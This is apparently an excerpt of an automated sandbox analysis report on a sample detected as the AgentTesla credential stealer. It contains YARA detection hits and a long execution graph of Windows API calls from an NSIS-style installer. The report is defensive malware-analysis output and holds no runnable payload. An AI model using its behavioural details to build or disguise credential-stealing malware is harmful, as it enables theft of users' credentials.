                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:false

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:19.9%
                                                Dynamic/Decrypted Code Coverage:15.2%
                                                Signature Coverage:18.5%
                                                Total number of Nodes:1510
                                                Total number of Limit Nodes:43
                                                execution_graph 4931 10001000 4934 1000101b 4931->4934 4941 1000152e 4934->4941 4936 10001020 4937 10001024 4936->4937 4938 10001027 GlobalAlloc 4936->4938 4939 10001555 3 API calls 4937->4939 4938->4937 4940 10001019 4939->4940 4942 10001243 3 API calls 4941->4942 4944 10001534 4942->4944 4943 1000153a 4943->4936 4944->4943 4945 10001546 GlobalFree 4944->4945 4945->4936 4946 404241 lstrcpynW lstrlenW 4947 401d41 GetDC GetDeviceCaps 4948 402b1b 18 API calls 4947->4948 4949 401d5f MulDiv ReleaseDC 4948->4949 4950 402b1b 18 API calls 4949->4950 4951 401d7e 4950->4951 4952 405f0a 18 API calls 4951->4952 4953 401db7 CreateFontIndirectW 4952->4953 4954 4024e6 4953->4954 4955 401a42 4956 402b1b 18 API calls 4955->4956 4957 401a48 4956->4957 4958 402b1b 18 API calls 4957->4958 4959 4019f0 4958->4959 4960 402744 4961 40273f 4960->4961 4961->4960 4962 402754 FindNextFileW 4961->4962 4963 4027a6 4962->4963 4965 40275f 4962->4965 4966 405ee8 lstrcpynW 4963->4966 4966->4965 4974 401cc6 4975 402b1b 18 API calls 4974->4975 4976 401cd9 SetWindowLongW 4975->4976 4977 4029c5 4976->4977 4119 401dc7 4127 402b1b 4119->4127 4121 401dcd 4122 402b1b 18 API calls 4121->4122 4123 401dd6 4122->4123 4124 401de8 EnableWindow 4123->4124 4125 401ddd ShowWindow 4123->4125 4126 4029c5 4124->4126 4125->4126 4128 405f0a 18 API calls 4127->4128 4129 402b2f 4128->4129 4129->4121 4978 4045c8 4979 4045f4 4978->4979 4980 404605 4978->4980 5039 4056a8 GetDlgItemTextW 4979->5039 4982 404611 GetDlgItem 4980->4982 4987 404670 4980->4987 4984 404625 4982->4984 4983 4045ff 4986 40617c 5 API calls 4983->4986 4989 404639 SetWindowTextW 4984->4989 4995 4059de 4 API calls 4984->4995 4985 404754 4990 4048f5 4985->4990 5041 4056a8 GetDlgItemTextW 4985->5041 4986->4980 4987->4985 4987->4990 4991 405f0a 18 API calls 4987->4991 4993 40412d 19 API calls 4989->4993 4994 404194 8 API calls 4990->4994 4996 4046e4 SHBrowseForFolderW 4991->4996 4992 404784 4997 405a3b 18 API calls 4992->4997 4998 404655 4993->4998 4999 404909 4994->4999 5000 40462f 4995->5000 4996->4985 5001 4046fc CoTaskMemFree 4996->5001 5002 40478a 4997->5002 5003 40412d 19 API calls 4998->5003 5000->4989 5006 405933 3 API calls 5000->5006 5004 405933 3 API calls 5001->5004 5042 405ee8 lstrcpynW 5002->5042 5005 404663 5003->5005 5007 404709 5004->5007 5040 404162 SendMessageW 5005->5040 5006->4989 5010 404740 SetDlgItemTextW 5007->5010 5015 405f0a 18 API calls 5007->5015 5010->4985 5011 404669 5013 406252 3 API calls 5011->5013 5012 4047a1 5014 406252 3 API calls 5012->5014 5013->4987 5022 4047a9 5014->5022 5016 404728 lstrcmpiW 5015->5016 5016->5010 5019 404739 lstrcatW 5016->5019 5017 4047e8 5043 405ee8 lstrcpynW 5017->5043 5019->5010 5020 4047ef 5021 4059de 4 API calls 5020->5021 5023 4047f5 GetDiskFreeSpaceW 5021->5023 5022->5017 5025 40597f 2 API calls 5022->5025 5027 40483a 5022->5027 5026 404818 MulDiv 5023->5026 5023->5027 5025->5022 5026->5027 5028 4048a4 5027->5028 5044 404976 5027->5044 5030 4048c7 5028->5030 5032 40140b 2 API calls 5028->5032 5052 40414f KiUserCallbackDispatcher 5030->5052 5031 404896 5034 4048a6 SetDlgItemTextW 5031->5034 5035 40489b 5031->5035 5032->5030 5034->5028 5037 404976 21 API calls 5035->5037 5036 4048e3 5036->4990 5053 40455d 5036->5053 5037->5028 5039->4983 5040->5011 5041->4992 5042->5012 5043->5020 5045 404993 5044->5045 5046 405f0a 18 API calls 5045->5046 5047 4049c8 5046->5047 5048 405f0a 18 API calls 5047->5048 5049 4049d3 5048->5049 5050 405f0a 18 API calls 5049->5050 5051 404a04 lstrlenW wsprintfW SetDlgItemTextW 5050->5051 5051->5031 5052->5036 5054 404570 SendMessageW 5053->5054 5055 40456b 5053->5055 5054->4990 5055->5054 5056 4042ca 5057 4042e2 5056->5057 5058 4043fc 5056->5058 5062 40412d 19 API calls 5057->5062 5059 404466 5058->5059 5061 404538 5058->5061 5064 404437 GetDlgItem SendMessageW 5058->5064 5060 404470 GetDlgItem 5059->5060 5059->5061 5063 40448a 5060->5063 5067 4044f9 5060->5067 5066 404194 8 API calls 5061->5066 5065 404349 5062->5065 5063->5067 5071 4044b0 6 API calls 5063->5071 5087 40414f KiUserCallbackDispatcher 5064->5087 5069 40412d 19 API calls 5065->5069 5070 404533 5066->5070 5067->5061 5072 40450b 5067->5072 5074 404356 CheckDlgButton 5069->5074 5071->5067 5075 404521 5072->5075 5076 404511 SendMessageW 5072->5076 5073 404461 5077 40455d SendMessageW 5073->5077 5085 40414f KiUserCallbackDispatcher 5074->5085 5075->5070 5079 404527 SendMessageW 5075->5079 5076->5075 5077->5059 5079->5070 5080 404374 GetDlgItem 5086 404162 SendMessageW 5080->5086 5082 40438a SendMessageW 5083 4043b0 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5082->5083 5084 4043a7 GetSysColor 5082->5084 5083->5070 5084->5083 5085->5080 5086->5082 5087->5073 5088 4024ca 5089 402b38 18 API calls 5088->5089 5090 4024d1 5089->5090 5093 405b54 GetFileAttributesW CreateFileW 5090->5093 5092 4024dd 5093->5092 5094 401bca 5095 402b1b 18 API calls 5094->5095 5096 401bd1 5095->5096 5097 402b1b 18 API calls 5096->5097 5098 401bdb 5097->5098 5099 401beb 5098->5099 5100 402b38 18 API calls 5098->5100 5101 401bfb 5099->5101 5102 402b38 18 API calls 5099->5102 5100->5099 5103 401c06 5101->5103 5104 401c4a 5101->5104 5102->5101 5106 402b1b 18 API calls 5103->5106 5105 402b38 18 API calls 5104->5105 5107 401c4f 5105->5107 5108 401c0b 5106->5108 5109 402b38 18 API calls 5107->5109 5110 402b1b 18 API calls 5108->5110 5111 401c58 FindWindowExW 5109->5111 5112 401c14 5110->5112 5115 401c7a 5111->5115 5113 401c3a SendMessageW 5112->5113 5114 401c1c SendMessageTimeoutW 5112->5114 5113->5115 5114->5115 5116 40194b 5117 402b1b 18 API calls 5116->5117 5118 401952 5117->5118 5119 402b1b 18 API calls 5118->5119 5120 40195c 5119->5120 5121 402b38 18 API calls 5120->5121 5122 401965 5121->5122 5123 401979 lstrlenW 5122->5123 5124 4019b5 5122->5124 5125 401983 5123->5125 5125->5124 5129 405ee8 lstrcpynW 5125->5129 5127 40199e 5127->5124 5128 4019ab lstrlenW 5127->5128 5128->5124 5129->5127 5133 4019cf 5134 402b38 18 API calls 5133->5134 5135 4019d6 5134->5135 5136 402b38 18 API calls 5135->5136 5137 4019df 5136->5137 5138 4019e6 lstrcmpiW 5137->5138 5139 4019f8 lstrcmpW 5137->5139 5140 4019ec 5138->5140 5139->5140 4208 401e51 4209 402b38 18 API calls 4208->4209 4210 401e57 4209->4210 4211 405192 25 API calls 4210->4211 4212 401e61 4211->4212 4226 405663 CreateProcessW 4212->4226 4215 401ec6 CloseHandle 4218 402791 4215->4218 4216 401e77 WaitForSingleObject 4217 401e89 4216->4217 4219 401e9b GetExitCodeProcess 4217->4219 4220 40628b 2 API calls 4217->4220 4221 401eba 4219->4221 4222 401ead 4219->4222 4223 401e90 WaitForSingleObject 4220->4223 4221->4215 4225 401eb8 4221->4225 4229 405e2f wsprintfW 4222->4229 4223->4217 4225->4215 4227 405692 CloseHandle 4226->4227 4228 401e67 4226->4228 4227->4228 4228->4215 4228->4216 4228->4218 4229->4225 4230 402251 4231 40225f 4230->4231 4232 402259 4230->4232 4233 40226d 4231->4233 4235 402b38 18 API calls 4231->4235 4234 402b38 18 API calls 4232->4234 4236 402b38 18 API calls 4233->4236 4238 40227b 4233->4238 4234->4231 4235->4233 4236->4238 4237 402b38 18 API calls 4239 402284 WritePrivateProfileStringW 4237->4239 4238->4237 4240 4052d1 4241 4052f2 GetDlgItem GetDlgItem GetDlgItem 4240->4241 4242 40547d 4240->4242 4286 404162 SendMessageW 4241->4286 4244 405486 GetDlgItem CreateThread CloseHandle 4242->4244 4245 4054ae 4242->4245 4244->4245 4309 405265 OleInitialize 4244->4309 4247 4054d9 4245->4247 4248 4054c5 ShowWindow ShowWindow 4245->4248 4249 4054fe 4245->4249 4246 405363 4255 40536a GetClientRect GetSystemMetrics SendMessageW SendMessageW 4246->4255 4250 4054e5 4247->4250 4256 405539 4247->4256 4291 404162 SendMessageW 4248->4291 4295 404194 4249->4295 4252 405513 ShowWindow 4250->4252 4253 4054ed 4250->4253 4260 405533 4252->4260 4261 405525 4252->4261 4292 404106 4253->4292 4262 4053d9 4255->4262 4263 4053bd SendMessageW SendMessageW 4255->4263 4256->4249 4257 405547 SendMessageW 4256->4257 4259 40550c 4257->4259 4264 405560 CreatePopupMenu 4257->4264 4268 404106 SendMessageW 4260->4268 4267 405192 25 API calls 4261->4267 4265 4053ec 4262->4265 4266 4053de SendMessageW 4262->4266 4263->4262 4269 405f0a 18 API calls 4264->4269 4287 40412d 4265->4287 4266->4265 4267->4260 4268->4256 4271 405570 AppendMenuW 4269->4271 4273 4055a0 TrackPopupMenu 4271->4273 4274 40558d GetWindowRect 4271->4274 4272 4053fc 4275 405405 ShowWindow 4272->4275 4276 405439 GetDlgItem SendMessageW 4272->4276 4273->4259 4277 4055bb 4273->4277 4274->4273 4278 40541b ShowWindow 4275->4278 4281 405428 4275->4281 4276->4259 4279 405460 SendMessageW SendMessageW 4276->4279 4280 4055d7 SendMessageW 4277->4280 4278->4281 4279->4259 4280->4280 4282 4055f4 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4280->4282 4290 404162 SendMessageW 4281->4290 4284 405619 SendMessageW 4282->4284 4284->4284 4285 405642 GlobalUnlock SetClipboardData CloseClipboard 4284->4285 4285->4259 4286->4246 4288 405f0a 18 API calls 4287->4288 4289 404138 SetDlgItemTextW 4288->4289 4289->4272 4290->4276 4291->4247 4293 404113 SendMessageW 4292->4293 4294 40410d 4292->4294 4293->4249 4294->4293 4296 4041ac GetWindowLongW 4295->4296 4297 404235 4295->4297 4296->4297 4298 4041bd 4296->4298 4297->4259 4299 4041cc GetSysColor 4298->4299 4300 4041cf 4298->4300 4299->4300 4301 4041d5 SetTextColor 4300->4301 4302 4041df SetBkMode 4300->4302 4301->4302 4303 4041f7 GetSysColor 4302->4303 4304 4041fd 4302->4304 4303->4304 4305 404204 SetBkColor 4304->4305 4306 40420e 4304->4306 4305->4306 4306->4297 4307 404221 DeleteObject 4306->4307 4308 404228 CreateBrushIndirect 4306->4308 4307->4308 4308->4297 4316 404179 4309->4316 4311 405288 4315 4052af 4311->4315 4319 401389 4311->4319 4312 404179 SendMessageW 4313 4052c1 OleUninitialize 4312->4313 4315->4312 4317 404191 4316->4317 4318 404182 SendMessageW 4316->4318 4317->4311 4318->4317 4321 401390 4319->4321 4320 4013fe 4320->4311 4321->4320 4322 4013cb MulDiv SendMessageW 4321->4322 4322->4321 4323 401752 4324 402b38 18 API calls 4323->4324 4325 401759 4324->4325 4326 401781 4325->4326 4327 401779 4325->4327 4363 405ee8 lstrcpynW 4326->4363 4362 405ee8 lstrcpynW 4327->4362 4330 40177f 4334 40617c 5 API calls 4330->4334 4331 40178c 4332 405933 3 API calls 4331->4332 4333 401792 lstrcatW 4332->4333 4333->4330 4350 40179e 4334->4350 4335 40622b 2 API calls 4335->4350 4336 405b2f 2 API calls 4336->4350 4338 4017b0 CompareFileTime 4338->4350 4339 401870 4341 405192 25 API calls 4339->4341 4340 401847 4342 405192 25 API calls 4340->4342 4351 40185c 4340->4351 4344 40187a 4341->4344 4342->4351 4343 405ee8 lstrcpynW 4343->4350 4345 403060 46 API calls 4344->4345 4346 40188d 4345->4346 4347 4018a1 SetFileTime 4346->4347 4348 4018b3 CloseHandle 4346->4348 4347->4348 4348->4351 4352 4018c4 4348->4352 4349 405f0a 18 API calls 4349->4350 4350->4335 4350->4336 4350->4338 4350->4339 4350->4340 4350->4343 4350->4349 4357 4056c4 MessageBoxIndirectW 4350->4357 4361 405b54 GetFileAttributesW CreateFileW 4350->4361 4353 4018c9 4352->4353 4354 4018dc 4352->4354 4355 405f0a 18 API calls 4353->4355 4356 405f0a 18 API calls 4354->4356 4358 4018d1 lstrcatW 4355->4358 4359 4018e4 4356->4359 4357->4350 4358->4359 4360 4056c4 MessageBoxIndirectW 4359->4360 4360->4351 4361->4350 4362->4330 4363->4331 5141 402452 5142 402c42 19 API calls 5141->5142 5143 40245c 5142->5143 5144 402b1b 18 API calls 5143->5144 5145 402465 5144->5145 5146 402791 5145->5146 5147 402489 RegEnumValueW 5145->5147 5148 40247d RegEnumKeyW 5145->5148 5147->5146 5149 4024a2 RegCloseKey 5147->5149 5148->5149 5149->5146 5151 4022d3 5152 402303 5151->5152 5153 4022d8 5151->5153 5154 402b38 18 API calls 5152->5154 5155 402c42 19 API calls 5153->5155 5156 40230a 5154->5156 5157 4022df 5155->5157 5162 402b78 RegOpenKeyExW 5156->5162 5158 402b38 18 API calls 5157->5158 5161 402320 5157->5161 5159 4022f0 RegDeleteValueW RegCloseKey 5158->5159 5159->5161 5169 402ba3 5162->5169 5171 402bef 5162->5171 5163 402bc9 RegEnumKeyW 5164 402bdb RegCloseKey 5163->5164 5163->5169 5166 406252 3 API calls 5164->5166 5165 402c00 RegCloseKey 5165->5171 5168 402beb 5166->5168 5167 402b78 3 API calls 5167->5169 5170 402c1b RegDeleteKeyW 5168->5170 5168->5171 5169->5163 5169->5164 5169->5165 5169->5167 5170->5171 5171->5161 5172 401ed4 5173 402b38 18 API calls 5172->5173 5174 401edb 5173->5174 5175 40622b 2 API calls 5174->5175 5176 401ee1 5175->5176 5178 401ef2 5176->5178 5179 405e2f wsprintfW 5176->5179 5179->5178 4386 403c55 4387 403da8 4386->4387 4388 403c6d 4386->4388 4390 403df9 4387->4390 4391 403db9 GetDlgItem GetDlgItem 4387->4391 4388->4387 4389 403c79 4388->4389 4392 403c84 SetWindowPos 4389->4392 4393 403c97 4389->4393 4395 403e53 4390->4395 4400 401389 2 API calls 4390->4400 4394 40412d 19 API calls 4391->4394 4392->4393 4397 403cb4 4393->4397 4398 403c9c ShowWindow 4393->4398 4399 403de3 SetClassLongW 4394->4399 4396 404179 SendMessageW 4395->4396 4416 403da3 4395->4416 4426 403e65 4396->4426 4401 403cd6 4397->4401 4402 403cbc DestroyWindow 4397->4402 4398->4397 4403 40140b 2 API calls 4399->4403 4404 403e2b 4400->4404 4405 403cdb SetWindowLongW 4401->4405 4406 403cec 4401->4406 4455 4040b6 4402->4455 4403->4390 4404->4395 4407 403e2f SendMessageW 4404->4407 4405->4416 4410 403d95 4406->4410 4411 403cf8 GetDlgItem 4406->4411 4407->4416 4408 40140b 2 API calls 4408->4426 4409 4040b8 DestroyWindow EndDialog 4409->4455 4414 404194 8 API calls 4410->4414 4412 403d28 4411->4412 4413 403d0b SendMessageW IsWindowEnabled 4411->4413 4418 403d35 4412->4418 4419 403d7c SendMessageW 4412->4419 4420 403d48 4412->4420 4431 403d2d 4412->4431 4413->4412 4413->4416 4414->4416 4415 4040e7 ShowWindow 4415->4416 4417 405f0a 18 API calls 4417->4426 4418->4419 4418->4431 4419->4410 4423 403d50 4420->4423 4424 403d65 4420->4424 4421 404106 SendMessageW 4425 403d63 4421->4425 4422 40412d 19 API calls 4422->4426 4459 40140b 4423->4459 4427 40140b 2 API calls 4424->4427 4425->4410 4426->4408 4426->4409 4426->4416 4426->4417 4426->4422 4430 40412d 19 API calls 4426->4430 4446 403ff8 DestroyWindow 4426->4446 4429 403d6c 4427->4429 4429->4410 4429->4431 4432 403ee0 GetDlgItem 4430->4432 4431->4421 4433 403ef5 4432->4433 4434 403efd ShowWindow KiUserCallbackDispatcher 4432->4434 4433->4434 4456 40414f KiUserCallbackDispatcher 4434->4456 4436 403f27 EnableWindow 4439 403f3b 4436->4439 4437 403f40 GetSystemMenu EnableMenuItem SendMessageW 4438 403f70 SendMessageW 4437->4438 4437->4439 4438->4439 4439->4437 4457 404162 SendMessageW 4439->4457 4458 405ee8 lstrcpynW 4439->4458 4442 403f9e lstrlenW 4443 405f0a 18 API calls 4442->4443 4444 403fb4 SetWindowTextW 4443->4444 4445 401389 2 API calls 4444->4445 4445->4426 4447 404012 CreateDialogParamW 4446->4447 4446->4455 4448 404045 4447->4448 4447->4455 4449 40412d 19 API calls 4448->4449 4450 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4449->4450 4451 401389 2 API calls 4450->4451 4452 404096 4451->4452 4452->4416 4453 40409e ShowWindow 4452->4453 4454 404179 SendMessageW 4453->4454 4454->4455 4455->4415 4455->4416 4456->4436 4457->4439 4458->4442 4460 401389 2 API calls 4459->4460 4461 401420 4460->4461 4461->4431 4462 10002796 4463 100027e6 4462->4463 4464 100027a6 VirtualProtect 4462->4464 4464->4463 4465 4014d7 4466 402b1b 18 API calls 4465->4466 4467 4014dd Sleep 4466->4467 4469 4029c5 4467->4469 4470 403358 #17 SetErrorMode OleInitialize 4471 406252 3 API calls 4470->4471 4472 40339b SHGetFileInfoW 4471->4472 4543 405ee8 lstrcpynW 4472->4543 4474 4033c6 GetCommandLineW 4544 405ee8 lstrcpynW 4474->4544 4476 4033d8 GetModuleHandleW 4477 4033f0 4476->4477 4478 405960 CharNextW 4477->4478 4479 4033ff CharNextW 4478->4479 4489 40340f 4479->4489 4480 4034e4 4481 4034f8 GetTempPathW 4480->4481 4545 403324 4481->4545 4483 403510 4484 403514 GetWindowsDirectoryW lstrcatW 4483->4484 4485 40356a DeleteFileW 4483->4485 4487 403324 11 API calls 4484->4487 4553 402dba GetTickCount GetModuleFileNameW 4485->4553 4486 405960 CharNextW 4486->4489 4490 403530 4487->4490 4489->4480 4489->4486 4493 4034e6 4489->4493 4490->4485 4492 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4490->4492 4491 40357e 4494 403616 4491->4494 4497 403606 4491->4497 4501 405960 CharNextW 4491->4501 4496 403324 11 API calls 4492->4496 4637 405ee8 lstrcpynW 4493->4637 4640 4037c0 4494->4640 4500 403562 4496->4500 4583 4038b2 4497->4583 4500->4485 4500->4494 4505 403599 4501->4505 4503 403725 4507 4037a8 ExitProcess 4503->4507 4512 406252 3 API calls 4503->4512 4504 40362f 4506 4056c4 MessageBoxIndirectW 4504->4506 4509 4035e0 4505->4509 4510 403645 lstrcatW lstrcmpiW 4505->4510 4511 40363d ExitProcess 4506->4511 4514 405a3b 18 API calls 4509->4514 4510->4494 4515 403661 CreateDirectoryW SetCurrentDirectoryW 4510->4515 4513 403734 4512->4513 4516 406252 3 API calls 4513->4516 4517 4035ec 4514->4517 4518 403684 4515->4518 4519 403679 4515->4519 4520 40373d 4516->4520 4517->4494 4638 405ee8 lstrcpynW 4517->4638 4650 405ee8 lstrcpynW 4518->4650 4649 405ee8 lstrcpynW 4519->4649 4523 406252 3 API calls 4520->4523 4525 403746 4523->4525 4527 403794 ExitWindowsEx 4525->4527 4534 403754 GetCurrentProcess 4525->4534 4526 4035fb 4639 405ee8 lstrcpynW 4526->4639 4527->4507 4530 4037a1 4527->4530 4529 405f0a 18 API calls 4531 4036c3 DeleteFileW 4529->4531 4532 40140b 2 API calls 4530->4532 4533 4036d0 CopyFileW 4531->4533 4540 403692 4531->4540 4532->4507 4533->4540 4537 403764 4534->4537 4535 403719 4538 405d82 40 API calls 4535->4538 4536 405d82 40 API calls 4536->4540 4537->4527 4538->4494 4539 405f0a 18 API calls 4539->4540 4540->4529 4540->4535 4540->4536 4540->4539 4541 405663 2 API calls 4540->4541 4542 403704 CloseHandle 4540->4542 4541->4540 4542->4540 4543->4474 4544->4476 4546 40617c 5 API calls 4545->4546 4548 403330 4546->4548 4547 40333a 4547->4483 4548->4547 4549 405933 3 API calls 4548->4549 4550 403342 CreateDirectoryW 4549->4550 4651 405b83 4550->4651 4655 405b54 GetFileAttributesW CreateFileW 4553->4655 4555 402dfd 4582 402e0a 4555->4582 4656 405ee8 lstrcpynW 4555->4656 4557 402e20 4558 40597f 2 API calls 4557->4558 4559 402e26 4558->4559 4657 405ee8 lstrcpynW 4559->4657 4561 402e31 GetFileSize 4562 402f32 4561->4562 4580 402e48 4561->4580 4563 402d18 33 API calls 4562->4563 4565 402f39 4563->4565 4564 4032f7 ReadFile 4564->4580 4567 402f75 GlobalAlloc 4565->4567 4565->4582 4659 40330d SetFilePointer 4565->4659 4566 402fcd 4569 402d18 33 API calls 4566->4569 4568 402f8c 4567->4568 4573 405b83 2 API calls 4568->4573 4569->4582 4571 402f56 4574 4032f7 ReadFile 4571->4574 4572 402d18 33 API calls 4572->4580 4576 402f9d CreateFileW 4573->4576 4575 402f61 4574->4575 4575->4567 4575->4582 4577 402fd7 4576->4577 4576->4582 4658 40330d SetFilePointer 4577->4658 4579 402fe5 4581 403060 46 API calls 4579->4581 4580->4562 4580->4564 4580->4566 4580->4572 4580->4582 4581->4582 4582->4491 4584 406252 3 API calls 4583->4584 4585 4038c6 4584->4585 4586 4038cc 4585->4586 4587 4038de 4585->4587 4669 405e2f wsprintfW 4586->4669 4588 405db5 3 API calls 4587->4588 4589 40390e 4588->4589 4591 40392d lstrcatW 4589->4591 4593 405db5 3 API calls 4589->4593 4592 4038dc 4591->4592 4660 403b88 4592->4660 4593->4591 4596 405a3b 18 API calls 4597 40395f 4596->4597 4598 4039f3 4597->4598 4600 405db5 3 API calls 4597->4600 4599 405a3b 18 API calls 4598->4599 4601 4039f9 4599->4601 4602 403991 4600->4602 4603 403a09 LoadImageW 4601->4603 4604 405f0a 18 API calls 4601->4604 4602->4598 4608 4039b2 lstrlenW 4602->4608 4612 405960 CharNextW 4602->4612 4605 403a30 RegisterClassW 4603->4605 4606 403aaf 4603->4606 4604->4603 4609 403a66 SystemParametersInfoW CreateWindowExW 4605->4609 4610 403ab9 4605->4610 4607 40140b 2 API calls 4606->4607 4611 403ab5 4607->4611 4613 4039c0 lstrcmpiW 4608->4613 4614 4039e6 4608->4614 4609->4606 4610->4494 4611->4610 4619 403b88 19 API calls 4611->4619 4616 4039af 4612->4616 4613->4614 4617 4039d0 GetFileAttributesW 4613->4617 4615 405933 3 API calls 4614->4615 4620 4039ec 4615->4620 4616->4608 4618 4039dc 4617->4618 4618->4614 4621 40597f 2 API calls 4618->4621 4622 403ac6 4619->4622 4670 405ee8 lstrcpynW 4620->4670 4621->4614 4624 403ad2 ShowWindow LoadLibraryW 4622->4624 4625 403b55 4622->4625 4627 403af1 LoadLibraryW 4624->4627 4628 403af8 GetClassInfoW 4624->4628 4626 405265 5 API calls 4625->4626 4629 403b5b 4626->4629 4627->4628 4630 403b22 DialogBoxParamW 4628->4630 4631 403b0c GetClassInfoW RegisterClassW 4628->4631 4632 403b77 4629->4632 4633 403b5f 4629->4633 4634 40140b 2 API calls 4630->4634 4631->4630 4635 40140b 2 API calls 4632->4635 4633->4610 4636 40140b 2 API calls 4633->4636 4634->4610 4635->4610 4636->4610 4637->4481 4638->4526 4639->4497 4641 4037d1 CloseHandle 4640->4641 4642 4037db 4640->4642 4641->4642 4643 4037e5 CloseHandle 4642->4643 4644 4037ef 4642->4644 4643->4644 4672 40381d 4644->4672 4647 405770 71 API calls 4648 40361f OleUninitialize 4647->4648 4648->4503 4648->4504 4649->4518 4650->4540 4652 405b90 GetTickCount GetTempFileNameW 4651->4652 4653 403356 4652->4653 4654 405bc6 4652->4654 4653->4483 4654->4652 4654->4653 4655->4555 4656->4557 4657->4561 4658->4579 4659->4571 4661 403b9c 4660->4661 4671 405e2f wsprintfW 4661->4671 4663 403c0d 4664 405f0a 18 API calls 4663->4664 4665 403c19 SetWindowTextW 4664->4665 4666 40393d 4665->4666 4667 403c35 4665->4667 4666->4596 4667->4666 4668 405f0a 18 API calls 4667->4668 4668->4667 4669->4592 4670->4598 4671->4663 4674 40382b 4672->4674 4673 4037f4 4673->4647 4674->4673 4675 403830 FreeLibrary GlobalFree 4674->4675 4675->4673 4675->4675 5180 40155b 5181 40296b 5180->5181 5184 405e2f wsprintfW 5181->5184 5183 402970 5184->5183 4894 4023de 4905 402c42 4894->4905 4896 4023e8 4897 402b38 18 API calls 4896->4897 4898 4023f1 4897->4898 4899 4023fc RegQueryValueExW 4898->4899 4902 402791 4898->4902 4900 40241c 4899->4900 4901 402422 RegCloseKey 4899->4901 4900->4901 4909 405e2f wsprintfW 4900->4909 4901->4902 4906 402b38 18 API calls 4905->4906 4907 402c5b 4906->4907 4908 402c69 RegOpenKeyExW 4907->4908 4908->4896 4909->4901 5192 401ce5 GetDlgItem GetClientRect 5193 402b38 18 API calls 5192->5193 5194 401d17 LoadImageW SendMessageW 5193->5194 5195 4029c5 5194->5195 5196 401d35 DeleteObject 5194->5196 5196->5195 5197 40206a 5198 402b38 18 API calls 5197->5198 5199 402071 5198->5199 5200 402b38 18 API calls 5199->5200 5201 40207b 5200->5201 5202 402b38 18 API calls 5201->5202 5203 402084 5202->5203 5204 402b38 18 API calls 5203->5204 5205 40208e 5204->5205 5206 402b38 18 API calls 5205->5206 5207 402098 5206->5207 5208 4020ac CoCreateInstance 5207->5208 5209 402b38 18 API calls 5207->5209 5212 4020cb 5208->5212 5209->5208 5210 401423 25 API calls 5211 402195 5210->5211 5212->5210 5212->5211 5213 40156b 5214 401584 5213->5214 5215 40157b ShowWindow 5213->5215 5216 401592 ShowWindow 5214->5216 5217 4029c5 5214->5217 5215->5214 5216->5217 5218 4024ec 5219 4024f1 5218->5219 5220 40250a 5218->5220 5221 402b1b 18 API calls 5219->5221 5222 402510 5220->5222 5223 40253c 5220->5223 5228 4024f8 5221->5228 5224 402b38 18 API calls 5222->5224 5225 402b38 18 API calls 5223->5225 5226 402517 WideCharToMultiByte lstrlenA 5224->5226 5227 402543 lstrlenW 5225->5227 5226->5228 5227->5228 5229 402565 WriteFile 5228->5229 5230 402791 5228->5230 5229->5230 5231 40276e 5232 402b38 18 API calls 5231->5232 5233 402775 FindFirstFileW 5232->5233 5234 40279d 5233->5234 5237 402788 5233->5237 5235 4027a6 5234->5235 5239 405e2f wsprintfW 5234->5239 5240 405ee8 lstrcpynW 5235->5240 5239->5235 5240->5237 5241 4018ef 5242 401926 5241->5242 5243 402b38 18 API calls 5242->5243 5244 40192b 5243->5244 5245 405770 71 API calls 5244->5245 5246 401934 5245->5246 5247 403870 5248 40387b 5247->5248 5249 403882 GlobalAlloc 5248->5249 5250 40387f 5248->5250 5249->5250 5251 402571 5252 402b1b 18 API calls 5251->5252 5254 402580 5252->5254 5253 40269e 5254->5253 5255 4025c6 ReadFile 5254->5255 5256 405bd7 ReadFile 5254->5256 5257 4026a0 5254->5257 5258 402606 MultiByteToWideChar 5254->5258 5260 40262c SetFilePointer MultiByteToWideChar 5254->5260 5261 4026b1 5254->5261 5255->5253 5255->5254 5256->5254 5263 405e2f wsprintfW 5257->5263 5258->5254 5260->5254 5261->5253 5262 4026d2 SetFilePointer 5261->5262 5262->5253 5263->5253 5264 4014f1 SetForegroundWindow 5265 4029c5 5264->5265 5273 4018f2 5274 402b38 18 API calls 5273->5274 5275 4018f9 5274->5275 5276 4056c4 MessageBoxIndirectW 5275->5276 5277 401902 5276->5277 4364 401df3 4365 402b38 18 API calls 4364->4365 4366 401df9 4365->4366 4367 402b38 18 API calls 4366->4367 4368 401e02 4367->4368 4369 402b38 18 API calls 4368->4369 4370 401e0b 4369->4370 4371 402b38 18 API calls 4370->4371 4372 401e14 4371->4372 4376 401423 4372->4376 4375 401e4c 4377 405192 25 API calls 4376->4377 4378 401431 ShellExecuteW 4377->4378 4378->4375 5290 4026f7 5291 4026fe 5290->5291 5293 402970 5290->5293 5292 402b1b 18 API calls 5291->5292 5294 402709 5292->5294 5295 402710 SetFilePointer 5294->5295 5295->5293 5296 402720 5295->5296 5298 405e2f wsprintfW 5296->5298 5298->5293 5306 40427b lstrlenW 5307 40429a 5306->5307 5308 40429c WideCharToMultiByte 5306->5308 5307->5308 5309 402c7d 5310 402c8f SetTimer 5309->5310 5311 402ca8 5309->5311 5310->5311 5312 402cf6 5311->5312 5313 402cfc MulDiv 5311->5313 5314 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 5313->5314 5314->5312 5316 1000103d 5317 1000101b 8 API calls 5316->5317 5318 10001056 5317->5318 5319 4014ff 5320 401507 5319->5320 5322 40151a 5319->5322 5321 402b1b 18 API calls 5320->5321 5321->5322 5323 401000 5324 401037 BeginPaint GetClientRect 5323->5324 5327 40100c DefWindowProcW 5323->5327 5325 4010f3 5324->5325 5328 401073 CreateBrushIndirect FillRect DeleteObject 5325->5328 5329 4010fc 5325->5329 5330 401179 5327->5330 5328->5325 5331 401102 CreateFontIndirectW 5329->5331 5332 401167 EndPaint 5329->5332 5331->5332 5333 401112 6 API calls 5331->5333 5332->5330 